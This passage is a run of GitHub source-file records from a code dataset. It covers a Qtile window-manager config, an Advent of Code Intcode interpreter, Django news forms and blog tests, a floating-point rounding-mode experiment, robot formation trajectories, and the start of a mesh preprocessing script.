return True\n","repo_name":"code-in-public/leetcode","sub_path":"course-schedule/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"264360236","text":"import os\nimport subprocess\nimport psutil\nimport random\nfrom typing import List # noqa: F401\n\nfrom libqtile import bar, layout, widget, hook, qtile\nfrom libqtile.config import Click, Drag, Group, Key, Screen, Match, ScratchPad, DropDown\nfrom libqtile.lazy import lazy\nfrom libqtile.log_utils import logger\n\n\nmod = \"mod4\"\nterminal = \"alacritty\"\nlauncher = \"rofi -show run\"\nwallpaper_folder = \"/home/michael/Pictures/backgrounds\"\n\nColor = {\n \"base000\": \"#21252C\",\n \"base00\": \"#282c34\",\n \"base01\": \"#353b45\",\n \"base02\": \"#3e4451\",\n \"base03\": \"#545862\",\n \"base04\": \"#565c64\",\n \"base05\": \"#abb2bf\",\n \"base06\": \"#b6bdca\",\n \"base07\": \"#c8ccd4\",\n \"light_red\": \"#e06c75\",\n \"dark_yellow\": \"#d19a66\",\n \"yellow\": \"#e5c07b\",\n \"green\": \"#98c379\",\n \"cyan\": \"#56b6c2\",\n \"blue\": \"#61afef\",\n \"violet\": \"#c678dd\",\n \"red\": \"#be5046\",\n}\n\n\ndef debug_log(qtile):\n pass\n\n\ndef get_wallpaper():\n list_of_wallpapers = os.listdir(wallpaper_folder)\n wallpaper = random.choice(list_of_wallpapers)\n wallpaper = f\"{wallpaper_folder}/{wallpaper}\"\n return wallpaper\n\n\nkeys = [\n # Switch between windows\n Key([mod], \"j\", lazy.layout.left(), desc=\"Move focus to left\"),\n Key([mod], \"p\", lazy.layout.right(), desc=\"Move focus to right\"),\n Key([mod], \"k\", lazy.layout.down(), desc=\"Move focus down\"),\n Key([mod], \"l\", lazy.layout.up(), desc=\"Move focus up\"),\n # Move windows between left/right columns or move up/down in current stack.\n Key(\n [mod, \"shift\"],\n \"j\",\n lazy.layout.shuffle_left(),\n desc=\"Move window to the left\",\n ),\n Key(\n [mod, \"shift\"],\n \"p\",\n lazy.layout.shuffle_right(),\n desc=\"Move window to the right\",\n ),\n Key([mod, \"shift\"], \"k\", lazy.layout.shuffle_down(), desc=\"Move window down\"),\n Key([mod, \"shift\"], \"l\", lazy.layout.shuffle_up(), desc=\"Move window up\"),\n # Switch window focus to other pane(s) of stack\n Key(\n [mod],\n \"Tab\",\n lazy.layout.next(),\n desc=\"Switch window focus to other pane(s) of stack\",\n ),\n # Toggle between different layouts as defined below\n Key([mod], \"a\", lazy.next_layout(), desc=\"Toggle between layouts\"),\n # Kill window\n Key([mod], \"q\", lazy.window.kill(), desc=\"Kill focused window\"),\n # Restart/Shutdown qtile\n Key([mod, \"control\"], \"r\", lazy.restart(), desc=\"Restart Qtile\"),\n Key([mod, \"control\"], \"q\", lazy.shutdown(), desc=\"Shutdown qtile\"),\n Key([mod, \"control\"], \"t\", lazy.function(debug_log), desc=\"Debug logging key\"),\n # Key(\n # [mod, \"control\"],\n # \"w\",\n # lazy.function(change_wallpaper),\n # desc=\"Change Wallpaper\"\n # ),\n # Spawn\n Key(\n [mod],\n \"space\",\n lazy.spawn(launcher),\n desc=\"Spawn a command using a prompt widget\",\n ),\n Key([mod], \"Return\", lazy.spawn(terminal), desc=\"Launch terminal\"),\n Key(\n [mod, \"shift\"],\n \"Return\",\n lazy.spawn(\"alacritty -e tmux new\"),\n # lazy.spawn(\"alacritty -e tmux new-window -t TMUX: & tmux attach -t TMUX\"),\n desc=\"Launch terminal\",\n ),\n Key([mod], \"f\", lazy.window.toggle_floating(), desc=\"Toggle floating\"),\n # Sount Output change\n Key(\n [mod, \"control\"],\n \"a\",\n lazy.spawn(\n 
\"/home/michael/scripts/sound-output.sh wireless_headphone\",\n ),\n desc=\"Change sound to wireless headphone\",\n ),\n Key(\n [mod, \"control\"],\n \"s\",\n lazy.spawn(\"/home/michael/scripts/sound-output.sh headphone\"),\n desc=\"Change sound to headphone\",\n ),\n Key(\n [mod, \"control\"],\n \"d\",\n lazy.spawn(\n \"/home/michael/scripts/sound-output.sh loudspeaker\",\n ),\n desc=\"Change sound to loudspeaker\",\n ),\n Key([], \"XF86AudioNext\", lazy.spawn(\"playerctl -p spotify next\")),\n Key([], \"XF86AudioPlay\", lazy.spawn(\"playerctl -p spotify play-pause\")),\n]\n\n# Clamp groups to specified screen.\ndef go_to_group(qtile, group_name, screen):\n qtile.focus_screen(screen)\n qtile.groups_map[group_name].cmd_toscreen(toggle=False)\n\n\nworkspaces = [\n {\"name\": \"1\"},\n {\"name\": \"2\"},\n {\"name\": \"3\", \"spawn\": \"spotify\", \"matches\": [Match(wm_class=\"spotify\")]},\n {\"name\": \"4\"},\n {\"name\": \"5\"},\n {\"name\": \"6\"},\n {\"name\": \"7\"},\n {\"name\": \"8\"},\n {\"name\": \"9\"},\n {\"name\": \"0\", \"screen\": 1},\n]\n\ngroups = []\nfor workspace in workspaces:\n matches = workspace[\"matches\"] if \"matches\" in workspace else None\n screen = workspace[\"screen\"] if \"screen\" in workspace else 0\n spawn = workspace[\"spawn\"] if \"spawn\" in workspace else None\n ws_name = workspace[\"name\"]\n # screen_affinity sounds like specifying a screen but doesn't work\n groups.append(Group(ws_name, matches=matches, spawn=spawn, screen_affinity=screen))\n keys.append(Key([mod], ws_name, lazy.function(go_to_group, ws_name, screen)))\n # keys.append(Key([mod], ws_name, lazy.group[ws_name].toscreen()))\n keys.append(Key([mod, \"shift\"], ws_name, lazy.window.togroup(ws_name)))\n\n\nlayouts = [\n layout.Max(name=\"\"),\n layout.MonadTall(\n name=\"\",\n margin=15,\n border_width=3,\n border_focus=Color[\"blue\"],\n border_normal=Color[\"base01\"],\n ),\n]\n\nwidget_defaults = dict(font=\"Inter\", fontsize=14, padding=3, foreground=Color[\"base07\"])\nextension_defaults = widget_defaults.copy()\n\nscreens = [\n Screen(\n top=bar.Bar(\n [\n widget.CurrentLayout(\n fmt=\"<big>{}</big>\",\n fontsize=24,\n padding=10,\n ),\n widget.GroupBox(\n font=\"Inter\",\n active=Color[\"base07\"],\n inactive=Color[\"base07\"],\n highlight_method=\"block\",\n block_highlight_text_color=Color[\"base00\"],\n rounded=False,\n other_screen_border=Color[\"blue\"],\n other_current_screen_border=Color[\"blue\"],\n this_current_screen_border=Color[\"blue\"],\n urgent_alert_method=\"block\",\n urgent_text=Color[\"base07\"],\n urgent_border=Color[\"red\"],\n hide_unused=True,\n disable_drag=True,\n ),\n widget.Spacer(),\n widget.StatusNotifier(),\n widget.Clock(\n format=\"%Y-%m-%d %a %H:%M\",\n ),\n ],\n 28,\n background=Color[\"base000\"],\n ),\n wallpaper=get_wallpaper(),\n wallpaper_mode=\"fill\",\n ),\n Screen(wallpaper=get_wallpaper(), wallpaper_mode=\"fill\"),\n]\n\n# Drag floating layouts.\nmouse = [\n Drag(\n [mod],\n \"Button1\",\n lazy.window.set_position_floating(),\n start=lazy.window.get_position(),\n ),\n Drag(\n [mod], \"Button3\", lazy.window.set_size_floating(), start=lazy.window.get_size()\n ),\n Click([mod], \"Button2\", lazy.window.bring_to_front()),\n]\n\ndgroups_key_binder = None\ndgroups_app_rules = [] # type: List\nmain = None\nfollow_mouse_focus = True\nbring_front_click = False\ncursor_warp = False\nfloating_layout = layout.Floating(\n float_rules=[\n # Run the utility of `xprop` to see the wm class and name of an X client.\n 
*layout.Floating.default_float_rules,\n Match(\n title=\"Library\", wm_class=\"firefox\"\n ), # Firefox Downloads, History, Bookmark manager window\n Match(wm_class=\"confirm\"),\n Match(wm_class=\"dialog\"),\n Match(wm_class=\"download\"),\n Match(wm_class=\"error\"),\n Match(wm_class=\"file_progress\"),\n Match(wm_class=\"notification\"),\n Match(wm_class=\"splash\"),\n Match(wm_class=\"toolbar\"),\n Match(wm_class=\"confirmreset\"), # gitk\n Match(wm_class=\"makebranch\"), # gitk\n Match(wm_class=\"maketag\"), # gitk\n Match(wm_class=\"ssh-askpass\"), # ssh-askpass\n Match(title=\"branchdialog\"), # gitk\n Match(title=\"pinentry\"), # GPG key password entry\n ],\n margin=15,\n border_width=3,\n border_focus=Color[\"blue\"],\n border_normal=Color[\"base01\"],\n)\nauto_fullscreen = True\nfocus_on_window_activation = \"smart\"\nwmname = \"LG3D\"\n\n# TODO: This gets ugly. There is probably a better way to do it.\n@hook.subscribe.client_new\ndef new_client(new_window):\n current_group = qtile.current_group\n if current_group.name == \"1\" and current_group.windows:\n if (\n \"firefox\" in current_group.windows[0].get_wm_class()\n and \"firefox\" in new_window.get_wm_class()\n and new_window.name\n != \"Library\" # firefox Downloads/Bookmarks/History manager window\n and new_window.get_wm_role() != \"Dialog\"\n and new_window.get_wm_role() != \"GtkFileChooserDialog\"\n ):\n new_window.togroup(\"0\")\n\n\n# If we don't focus group['0'] at the start, qtile will put group['2'] on the second monitor\n# For some reason I can't call my already defined lazy_function above\n# needs import: from libqtile import qtile\n@hook.subscribe.startup_complete\ndef start_finished():\n qtile.focus_screen(1)\n qtile.groups_map[\"0\"].cmd_toscreen(toggle=False)\n qtile.focus_screen(0)\n qtile.groups_map[\"1\"].cmd_toscreen(toggle=False)\n\n\n@hook.subscribe.startup_once\ndef autostart():\n home = os.path.expanduser(\"~\")\n subprocess.Popen([home + \"/.config/qtile/autostart.sh\"])\n","repo_name":"michael-oti/dotfiles","sub_path":".config/qtile/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":9525,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"45170881291","text":"# https://adventofcode.com/2019/day/5\n\nimport os\n\nSCRIPT_DIR = os.path.dirname(__file__)\nINPUT_FILENAME = 'inputs.txt'\n\nCODES = {\n 'ADD': 1,\n 'MULTI': 2,\n 'INPUT': 3,\n 'OUTPUT': 4,\n 'JUMP_IF_TRUE': 5,\n 'JUMP_IF_FALSE': 6,\n 'LESS_THAN': 7,\n 'EQUALS': 8,\n 'EXIT': 99,\n}\nPOSITION_MODE = 0\nIMMEDIATE_MODE = 1\nLOG_IDX = -1\n\ndef get_inputs(dir, filename):\n file = os.path.join(dir, filename)\n inputs = []\n\n with open(file, 'r') as f:\n inputs = f.read().splitlines()\n\n return inputs[0].split(',')\n\ndef get_program_values(i, inputs, params):\n if len(params) == 0 or int(params[0]) == POSITION_MODE:\n val1 = inputs[int(inputs[i+1])]\n else:\n val1 = inputs[i+1]\n\n if len(params) <= 1 or int(params[1]) == POSITION_MODE:\n val2 = inputs[int(inputs[i+2])]\n else:\n val2 = inputs[i+2]\n\n return [int(val1), int(val2)]\n\ndef intcode(intcode_input, inputs):\n inputs_copy = inputs.copy()\n outputs = []\n\n total_inputs = len(inputs_copy)\n i = 0\n while i < total_inputs:\n input_program = list(str(inputs_copy[i]))\n optcode = int(''.join(input_program[-2:]))\n params = input_program[0:-2]\n params.reverse()\n\n if (optcode not in CODES.values()) or (optcode == CODES['EXIT']):\n break\n\n if optcode == CODES['INPUT']:\n inputs_copy[int(inputs_copy[i+1])] = 
intcode_input\n step = 2\n i += step\n continue\n\n elif optcode == CODES['OUTPUT']:\n if len(params) == 0 or int(params[0]) == POSITION_MODE:\n output = inputs_copy[int(inputs_copy[i+1])]\n else:\n output = inputs_copy[i+1]\n\n output = int(output)\n outputs.append(output)\n step = 2\n i += step\n continue\n\n elif optcode in [CODES['ADD'], CODES['MULTI'], CODES['LESS_THAN'], CODES['EQUALS']]:\n val1, val2 = get_program_values(i, inputs_copy, params)\n\n if optcode == CODES['ADD']:\n output = val1 + val2\n elif optcode == CODES['MULTI']:\n output = val1 * val2\n elif optcode == CODES['LESS_THAN']:\n if val1 < val2:\n output = 1\n else:\n output = 0\n elif optcode == CODES['EQUALS']:\n if val1 == val2:\n output = 1\n else:\n output = 0\n\n output_idx = int(inputs_copy[i+3])\n inputs_copy[output_idx] = output\n step = 4\n i += step\n continue\n\n elif optcode in [CODES['JUMP_IF_TRUE'], CODES['JUMP_IF_FALSE']]:\n val1, val2 = get_program_values(i, inputs_copy, params)\n\n if optcode == CODES['JUMP_IF_TRUE'] and val1 != 0:\n i = val2\n elif optcode == CODES['JUMP_IF_FALSE'] and val1 == 0:\n i = val2\n else:\n i += 3\n\n else:\n print('UNKNOWN OPTCODE!!!', i, 'input_program', input_program,\n 'optcode', optcode, 'params', params)\n\n return outputs\n\ndef main():\n inputs = get_inputs(SCRIPT_DIR, INPUT_FILENAME)\n answer = intcode(5, inputs)\n print(f'answer:', answer)\n\nmain()\n","repo_name":"thalida/adventofcode","sub_path":"2019/day-5/part-2--basic/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43587514839","text":"from django import forms\nfrom .models import News, Image\nfrom tinymce.widgets import TinyMCE\nfrom django.contrib.admin.widgets import AdminDateWidget\n\n\nTITLE_LENGTH_ERROR = \"This title lenght is too long, Please make sure title characters are 200 characters or less.\"\nTITLE_EMPTY_ERROR = \"You'll have to add a title.\"\nTEXT_EMPTY_ERROR = \"Please enter the content of the news.\"\nNO_CATEGORY_ERROR = \"Please select a author category.\"\n\n\nclass NewsForm(forms.ModelForm):\n title = forms.CharField(\n label='Title',\n widget=forms.TextInput(\n attrs={'placeholder': 'Enter the suitable title for the article'})\n )\n content = forms.CharField(widget=TinyMCE(\n attrs={'cols': 50, 'rows': 15}), error_messages={\n 'required': TEXT_EMPTY_ERROR\n })\n\n class Meta:\n model = News\n fields = ['title', 'content', 'created_date', 'status']\n widgets = {\n 'created_date': forms.DateInput(format=('%d-%m-%Y'), attrs={'firstDay': 1, 'pattern=': '\\d{4}-\\d{2}-\\d{2}', 'format': 'yyyy-mm-dd', 'type': 'date'}),\n }\n\n\nclass NewsAdminForm(forms.ModelForm):\n title = forms.CharField(\n label='Title',\n widget=forms.TextInput(\n attrs={'placeholder': 'Enter the suitable title for the article'})\n )\n content = forms.CharField(widget=TinyMCE(\n attrs={'cols': 50, 'rows': 15}), error_messages={\n 'required': TEXT_EMPTY_ERROR\n })\n created_date = forms.DateField(widget=AdminDateWidget())\n\n class Meta:\n model = News\n fields = ['title', 'content', 'created_date', 'status']\n widgets = {\n 'created_date': forms.DateInput(format=('%d-%m-%Y'), attrs={'firstDay': 1, 'pattern=': '\\d{4}-\\d{2}-\\d{2}', 'format': 'yyyy-mm-dd', 'type': 'date'}),\n }\n\n\nclass ImageForm(forms.ModelForm):\n image = forms.FileField(\n required=False, widget=forms.ClearableFileInput(attrs={'multiple': True}))\n\n class Meta:\n model = Image\n fields = (\n 'image',\n 
)\n","repo_name":"archesnep/danam52b","sub_path":"danam/danam/newsforms.py","file_name":"newsforms.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70728835574","text":"# logistic_function_rmode.py: ロジスティック写像(丸め誤差評価付き)\r\nimport rmode # 丸めモード変更\r\n\r\n# デフォルトモード(RN)\r\nrmode.print_rmode()\r\nx_rn = [0.7501] # 初期値を配列の先頭値に格納\r\n\r\n# x[i+1]に値を追加\r\nfor i in range(0, 100):\r\n x_rn.append(4 * x_rn[i] * (1 - x_rn[i]))\r\n\r\n# RPモード\r\nrmode.set_rmode(rmode.FE_UPWARD)\r\nrmode.print_rmode()\r\nx_rp = [0.7501] # 初期値を配列の先頭値に格納\r\n\r\n# x[i+1]に値を追加\r\nfor i in range(0, 100):\r\n x_rp.append(4 * x_rp[i] * (1 - x_rp[i]))\r\n\r\n# RMモード\r\nrmode.set_rmode(rmode.FE_DOWNWARD)\r\nrmode.print_rmode()\r\nx_rm = [0.7501] # 初期値を配列の先頭値に格納\r\n\r\n# x[i+1]に値を追加\r\nfor i in range(0, 100):\r\n x_rm.append(4 * x_rm[i] * (1 - x_rm[i]))\r\n\r\n# diff_rn_rm, diff_rn_rp, diff_rp_rm\r\nrel_diff_rn_rm = [abs((x_rn[i] - x_rm[i]) / x_rn[i]) for i in range(len(x_rn))]\r\nrel_diff_rn_rp = [abs((x_rn[i] - x_rp[i]) / x_rn[i]) for i in range(len(x_rn))]\r\nrel_diff_rm_rp = [abs((x_rm[i] - x_rp[i]) / x_rn[i]) for i in range(len(x_rn))]\r\nmax_rel_diff = [\r\n max(\r\n rel_diff_rn_rm[i],\r\n rel_diff_rn_rp[i],\r\n rel_diff_rm_rp[i]\r\n ) for i in range(len(x_rn))\r\n]\r\n\r\n# x[0], x[10], ..., x[100]を表示\r\nprint(' i, x_rm[i] , x_rn[i] , x_rp[i] ,max_rel_diff')\r\nfor i in range(0, 101):\r\n if i % 10 == 0:\r\n print(f'{i:5d}, {x_rm[i]:25.17e}, {x_rn[i]:25.17e}, {x_rp[i]:25.17e}, {max_rel_diff[i]:5.1e}')\r\n\r\n\r\n# -------------------------------------\r\n# Copyright (c) 2021 Tomonori Kouya\r\n# All rights reserved.\r\n# -------------------------------------\r\n","repo_name":"tkouya/inapy","sub_path":"chapter04/logistic_function_rmode.py","file_name":"logistic_function_rmode.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"} +{"seq_id":"8721114811","text":"#!/usr/bin/env python3\n\ndef div(n, q=0):\n if n == 1:\n return q,n\n elif n == 0:\n return q,n\n else:\n q += 1\n return div(n//2, q)\n\n\ndef nearest(n):\n ''' given input n\n find the nearest power\n of 2 closest to n\n '''\n # q is the number of time n was divided by 2\n # repeatedly until we get either 1 or 0\n q,r = div(n)\n if r == 1:\n return 2**(q+1)\n else:\n return 2**q\n\n\nif __name__ == \"__main__\":\n print(nearest(129))\n\n","repo_name":"adypd97/merkeltree","sub_path":"test/powoftwo.py","file_name":"powoftwo.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33119355715","text":"from django.test import TestCase\nfrom django.utils import timezone\n\nfrom .models import Blog, Entry, Author, Comment\n\n# Create your tests here.\n\nclass BlogTests(TestCase):\n def test_all_tests(self):\n # delete all the data from all the models\n Comment.objects.all().delete()\n Entry.objects.all().delete()\n Author.objects.all().delete()\n Blog.objects.all().delete()\n # populate with some data\n now = timezone.now()\n b = Blog(name = \"Lissun ruokablogi\", tagline=\"Parasta ruokaa 2018\")\n b.save()\n author_lissu = Author(name=\"Lissu Sörsseli\",email=\"lissu@kokki.com\")\n author_lissu.save()\n author_jaana = Author(name=\"Jaana Jämäpuoli\",email=\"jaana@kyokki.com\")\n author_jaana.save()\n author_kalle = Author(name=\"Kalle Kädetön\", email=\"enosaa@muutakaan.com\")\n 
author_kalle.save()\n entry_kakku = Entry(blog=b, headline=\"Maailman helpoin kakku\",\n body_text=\"tarvitset vain jauhoa, sokeria ja munaa\")\n entry_kakku.save() # must save before you can ManyToManyFields\n entry_kakku.authors.add(author_lissu) # ManyToManyFields are added\n entry_kakku.authors.add(author_jaana)\n comment = Comment(entry=entry_kakku, text=\"Todella hyvä\")\n comment.save()\n comment = Comment(entry=entry_kakku, text=\"Ihan paras\")\n comment.save()\n entry_pulla = Entry(blog=b, headline=\"Nopeat pullat\", \n body_text=\"Pistä kaupan valmiit jäiset pullaan uuniin ja +200 C, 10 min\")\n entry_pulla.save()\n entry_pulla.authors.add(author_lissu)\n comment = Comment(entry=entry_pulla, text=\"Supernopea!\")\n comment.save()\n b2 = Blog(name=\"Kallen sotkut\", tagline=\"Äijien safkaa\")\n b2.save()\n entry_pizza = Entry(blog=b2, headline=\"Äijäpizza\",\n body_text=\"ÄLÄ säästele missään raaka-aineissa\")\n entry_pizza.save()\n entry_pizza.authors.add(author_kalle)\n comment = Comment(entry=entry_pizza, text=\"ei tätä pysty syömään\")\n comment.save()\n comment = Comment(entry=entry_pizza, text=\"Kerrankin kunnon mättöä!\")\n comment.save()\n # let's do some queries\n # I know these should be asserts, but I am too lazy :)\n print(\"How many authors kakku entry has\")\n kakku = Entry.objects.get(headline__contains=\"kakku\") # get finds single\n print(kakku.authors.count())\n print(\"All blog entries made by Lissu by publishing date order\")\n entries = Entry.objects.filter(authors__name=\"Lissu Sörsseli\").order_by('pub_date')\n print(entries)\n print(\"All blog entries made by Lissu by reverse publishing date order\")\n entries = Entry.objects.filter(authors__name=\"Lissu Sörsseli\").order_by('-pub_date')\n print(entries)\n print(\"All comments:\")\n comments = Comment.objects.all()\n print(comments)\n print(\"Comments to Lissu's blog entries\")\n comments = Comment.objects.filter(entry__authors__name=\"Lissu Sörsseli\")\n print(comments)\n \n","repo_name":"hamk-webdev-18a/petrikuittinen_django","sub_path":"blog/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27013698710","text":"import numpy as np\nfrom copy import copy\nfrom numpy import array\nfrom numpy import trapz\n\nfrom utils.utils import connect, distance\n\nclass Trajectory:\n def __init__(self, coords):\n self.start = coords[0]\n self.end = coords[1]\n self.line = connect(array([[self.start[0], self.start[1]],\n [self.end[0], self.end[1]]]))\n\n\n # Calculate at the end of train episode\n def compute_total_traj_disruption(self, robot_history):\n robot_history = array(robot_history)\n robot_history_sorted = robot_history[robot_history[:, 1].argsort()]\n x_robot = []\n y_robot = []\n for point in robot_history_sorted:\n if point[0] == 0 and point[1]==0: continue\n x_robot.append(point[0] - self.start[0])\n y_robot.append(-1*(point[1] - self.start[1]))\n robot_area = trapz(x=x_robot, y=y_robot)\n return abs(robot_area)\n\n\n\nclass Formation:\n def __init__(self, name, robots, ids):\n self.robots = robots\n self.ids = ids\n if name == \"triangle\": self.formation = self._triangle_formation()\n elif name == \"line\": self.formation = self._line_formation()\n elif name == \"square\": self.formation = self._square_formation()\n # self.formation final look:\n # [[(200, 100), (700, 100)], [(250, 100), (750, 100)], [(225, 150), (725, 150)]]\n self.end_middle_coordinate = 
self._compute_end_point()\n self.dists = {}\n self.assign_trajs()\n self.assign_dists()\n\n def _triangle_formation(self):\n start = [(50, 100), (50, 150), (93, 125)]\n end = list(map(lambda coords: (coords[0]+500, coords[1]), start))\n return [[x,y] for x,y in zip(start, end)]\n\n def _line_formation(self):\n start = [(200, 100), (200, 130), (200, 160)]\n end = list(map(lambda coords: (coords[0]+500, coords[1]), start))\n return [[x, y] for x, y in zip(start, end)]\n \n def _square_formation(self):\n start = [(200, 100), (200, 130), (230, 130), (230,100)]\n end = list(map(lambda coords: (coords[0]+500, coords[1]), start))\n return [[x, y] for x, y in zip(start, end)]\n\n def assign_trajs(self):\n \"\"\" Assigns desired trajectory to each robot, respectively.\n \"\"\"\n for robot, formation_coords in zip(self.robots, self.formation):\n traj = Trajectory(formation_coords)\n robot.trajectory = traj # [(start),(end)]\n robot.x, robot.y = traj.start\n \n # def get_goal_distances(self):\n # start = [x[0] for x in self.formation]\n # return {(0,1): (abs(start[0][0]-start[1][0]), abs(start[0][1]-start[1][1])),\n # (0,2): (abs(start[0][0]-start[2][0]), abs(start[0][1]-start[2][1])),\n # (1,2): (abs(start[2][0]-start[1][0]), abs(start[2][1]-start[1][1]))}\n\n def assign_dists(self):\n \"\"\" For each robot in the swarm, assigns the desired distance to mantain \n with respects to every other robot in the swarm.\n \"\"\"\n starts = [x[0] for x in self.formation]\n for robot in self.robots:\n robot.distances = {}\n robot.distances_log = {}\n for id, entry in enumerate(starts):\n if id == robot.id:\n continue\n else:\n dist = distance(robot.position, entry)\n self.dists[(robot.id, id)] = dist\n robot.distances[id] = (abs(dist))\n robot.distances_log[id] = [(abs(dist))]\n\n def get_distances(self) -> dict:\n \"\"\" Gets current distances between robots.\n \"\"\"\n dists = {}\n for robot in self.robots:\n new_ids = copy(self.ids)\n new_ids.remove(robot.id)\n for id in new_ids:\n dists[robot.id] = dict.fromkeys(new_ids, robot.distances_log[id][-1])\n return dists\n\n def _compute_end_point(self):\n # [[(200, 100), (700, 100)], [(250, 100), (750, 100)], [(225, 150), (725, 150)]]\n all_ends = [start_and_end[1] for start_and_end in self.formation]\n ends_x = [end[0] for end in all_ends]\n ends_y = [end[1] for end in all_ends]\n return (sum(ends_x)/len(ends_x), sum(ends_y)/len(ends_y))\n\n def dist_to_end_poit(self):\n return [distance(robot.position, self.end_middle_coordinate) for robot in self.robots]\n","repo_name":"MicImbriani/thesis_robotics","sub_path":"base/formation.py","file_name":"formation.py","file_ext":"py","file_size_in_byte":4425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8702026656","text":"#Setting up the mesh\n#1. Create V, T (mesh shape)\n#2. Figure out muscle fiber directions U\n#\t- harmonic function gradient\n#\t- heat\n#3. Get modes\n#5. Rotation clusters using K-means clustering on modes\n#6. BBW for skinning meshes. 
One handle per rotation cluster.\n\nimport numpy as np\nimport math\nfrom collections import defaultdict\nfrom sets import Set\nimport datetime\nimport json\nimport scipy\nfrom scipy.optimize import minimize\nfrom scipy.spatial import Delaunay\nfrom scipy import sparse\n\nimport random\nimport sys, os\nimport cProfile\nsys.path.insert(0, os.getcwd()+\"/../../libigl/python/\")\nimport pyigl as igl\nfrom Helpers import *\nfrom Mesh import Mesh\nnp.set_printoptions(threshold=\"nan\", linewidth=190, precision=8, formatter={'all': lambda x:'{:2.3f}'.format(x)})\nfrom iglhelpers import *\nimport json\n\n\nclass Preprocessing:\n\n\tdef __init__(self, _VT=None, modes_used=None):\n\t\tself.middle_button_down = False\n\t\tif _VT is not None:\n\t\t\tself.V = _VT[\"V\"]\n\t\t\tself.T = _VT[\"T\"]\n\n\t\t\tself.U = np.zeros(len(self.T))\n\t\t\tself.Fix = []# get_max(self.V, a=1, eps=1e-2)\t\t\n\t\t\tself.Mov = []#get_min(self.V, a=1, eps=1e-2)\n\t\t\tself.gi = 0\n\t\t\tself.mesh = None\n\t\t\tself.uvec = None\n\t\t\tself.eGu = None\n\t\t\tself.uClusters = []\n\t\t\tself.uClusterNum = -1\n\t\t\tself.modes_used = modes_used\n\t\tself.UVECS = None\n\n\tdef save_mesh_setup(self, name=None):\n\t\t#SAVE: V, T, Fixed points, Moving points,Eigs, EigV \n\t\t# Muscle clusters, Rotation clusters, Skinning Handles, \n\t\t# Maybe ARAP pre-processing info\n\n\t\t#AND json file with basic info\n\t\t# - mesh folder name (so ARAP pre-processing can potentially be saved)\n\t\t# - sizes, YM, poisson, muscle strengths, density\n\t\tif name is None:\n\t\t\tname = str(datetime.datetime.now())\n\t\t\tos.makedirs(\"./MeshSetups/\"+name)\n\t\tfolder = \"./MeshSetups/\"+name+\"/\"\n\t\tprint(\"writing DMATS to \"+folder)\n\t\tif self.mesh is not None:\n\t\t\tigl.writeDMAT(folder+\"V.dmat\", igl.eigen.MatrixXd(np.array(self.mesh.V)), True)\n\t\t\tigl.writeDMAT(folder+\"F.dmat\", igl.eigen.MatrixXi(self.mesh.T), True)\n\t\t\tigl.writeDMAT(folder+\"FixV.dmat\", igl.eigen.MatrixXi(np.array([self.mesh.fixed], dtype='int32')), True)\n\t\t\tigl.writeDMAT(folder+\"MovV.dmat\", igl.eigen.MatrixXi(np.array([self.mesh.mov], dtype='int32')), True)\n\t\t\tigl.writeDMAT(folder+\"Uvec.dmat\", igl.eigen.MatrixXd(np.array([self.mesh.u])), True)\n\n\t\t\tif self.mesh.Q is not None:\n\t\t\t\tigl.writeDMAT(folder+\"Modes.dmat\", igl.eigen.MatrixXd(self.mesh.Q), True)\n\t\t\t\t# igl.writeDMAT(folder+\"Eigs.dmat\")\n\t\t\tif self.mesh.r_element_cluster_map is not None:\n\t\t\t\tigl.writeDMAT(folder+\"Rclusters.dmat\", igl.eigen.MatrixXi(self.mesh.r_element_cluster_map), True)\n\t\t\tif self.mesh.s_handles_ind is not None:\n\t\t\t\tigl.writeDMAT(folder+\"SHandles.dmat\", igl.eigen.MatrixXi(np.array([self.mesh.s_handles_ind], dtype='int32')), True)\n\t\t\tif self.mesh.u_clusters_element_map is not None:\n\t\t\t\tfor i in range(len(self.mesh.u_clusters_element_map)):\n\t\t\t\t\tigl.writeDMAT(folder+\"uClusters\"+str(i)+\".dmat\", igl.eigen.MatrixXi(np.array([self.mesh.u_clusters_element_map[i]])), True)\n\n\t\t\tdata = {\"uClusters\": len(self.mesh.u_clusters_element_map)}\n\t\t\twith open(folder+\"params.json\", 'w') as outfile:\n\t\t\t\tjson.dump(data, outfile)\n\n\t\tprint(\"Done writing DMAT\")\n\n\tdef read_mesh_setup(self, name=None, modes_used=None):\n\t\tif name==None:\n\t\t\tprint(\"Name can't be none.\")\n\t\t\texit()\n\t\telse:\n\t\t\tfolder = \"./MeshSetups/\"+name+\"/\"\n\t\t\tjdata = json.load(open(folder+\"params.json\"))\n\t\t\tlen_uClusters = jdata['uClusters']\n\t\t\tprint(\"READING DMATs from \"+folder)\n\t\t\teV = 
